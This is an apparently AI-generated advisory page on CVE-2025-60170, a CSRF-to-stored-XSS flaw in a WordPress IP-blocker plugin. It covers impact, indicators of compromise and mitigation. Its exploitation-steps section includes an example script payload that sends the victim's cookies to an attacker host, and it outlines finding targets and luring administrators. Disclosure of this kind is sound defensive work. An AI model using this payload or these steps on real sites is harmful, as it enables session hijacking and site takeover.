CVE-2025-60170
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-60170 is a Cross-Site Request Forgery (CSRF) vulnerability in the HTACCESS IP Blocker WordPress plugin (developed by Taraprasad Swain) that can be leveraged to perform Stored Cross-Site Scripting (XSS) attacks. It affects all versions of the plugin up to and including version 1.0, with no official patch available as of the disclosure date. The vulnerability was reported by researcher Nguyen Xuan Chien on August 23, 2025, and publicly disclosed on September 26, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack).

Technical details

The vulnerability is classified under CWE-352 (Cross-Site Request Forgery) and maps to OWASP Top 10 category A1: Broken Access Control. The plugin fails to implement adequate CSRF token validation on sensitive form submissions, allowing an unauthenticated attacker to craft a malicious request that, when executed by an authenticated administrator, stores malicious JavaScript in the plugin's configuration — resulting in Stored XSS. Exploitation requires no privileges on the part of the attacker but does require user interaction from a privileged user (e.g., an administrator clicking a malicious link or visiting a crafted page) (Patchstack).

Impact

Successful exploitation allows an attacker to force a higher-privileged WordPress user (such as an administrator) to unknowingly submit malicious data, resulting in stored XSS payloads being persisted in the site's configuration. This can lead to session hijacking, credential theft, unauthorized administrative actions, or further compromise of the WordPress site and its visitors. The changed scope in the CVSS vector indicates that the impact extends beyond the plugin itself to the broader WordPress environment, affecting confidentiality, integrity, and availability at a low level each (Patchstack).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported for CVE-2025-60170. The EPSS score is approximately 0.014% (0.000140), indicating a very low probability of exploitation in the near term. Patchstack rates the priority as "Low" and notes the issue is unlikely to be exploited, though it acknowledges that CSRF vulnerabilities of this class are sometimes used in mass-exploit campaigns targeting WordPress plugins at scale (Patchstack). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the HTACCESS IP Blocker plugin version 1.0 or earlier, using tools like WPScan or by checking publicly accessible plugin metadata.
  2. Craft malicious request: Construct an HTML form or JavaScript snippet that submits a forged POST request to the plugin's settings endpoint, embedding a malicious XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) in an IP blocklist or configuration field.
  3. Deliver to administrator: Trick a logged-in WordPress administrator into visiting the attacker-controlled page (e.g., via phishing email or malicious link), causing the browser to automatically submit the forged form using the administrator's active session cookies.
  4. Stored XSS execution: The malicious payload is stored in the plugin's configuration. Any subsequent visit to the affected admin page by any privileged user triggers the stored XSS, enabling session hijacking, credential theft, or further site compromise (Patchstack).

Indicators of compromise

  • Logs: WordPress access logs showing unexpected POST requests to the HTACCESS IP Blocker plugin's settings/admin pages from unusual referrers or external origins.
  • File System: Unexpected or obfuscated JavaScript content stored in the plugin's database entries or options table (e.g., wp_options rows associated with htaccess-ip-blocker).
  • Network: Outbound requests from site visitors' browsers to unknown external domains shortly after visiting admin pages where the plugin's settings are displayed, potentially indicating XSS payload execution.
  • Database: Entries in the WordPress wp_options table for the plugin containing <script> tags or encoded JavaScript payloads.

Mitigation and workarounds

As of the disclosure date (September 26, 2025), no official patch is available for the HTACCESS IP Blocker plugin. The recommended immediate action is to deactivate and remove the plugin until a patched version is released. Site administrators should also ensure that WordPress nonce verification is enforced on all plugin form submissions as a general hardening measure. Using a WordPress security solution such as Patchstack can provide virtual patching to block exploitation attempts in the interim (Patchstack).

Additional resources


SourceThis report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2024-13784CRITICAL9.8
  • arforms-form-builder
NoYesAug 16, 2026
CVE-2026-17087HIGH7.5
  • wp-travel-engine
NoYesAug 16, 2026
CVE-2026-2497HIGH7.2
  • gallery-plugin
NoYesAug 16, 2026
CVE-2026-17608MEDIUM6.5
  • wp-compress-image-optimizer
NoYesAug 16, 2026
CVE-2026-2357MEDIUM6.4
  • bold-page-builder
NoYesAug 16, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management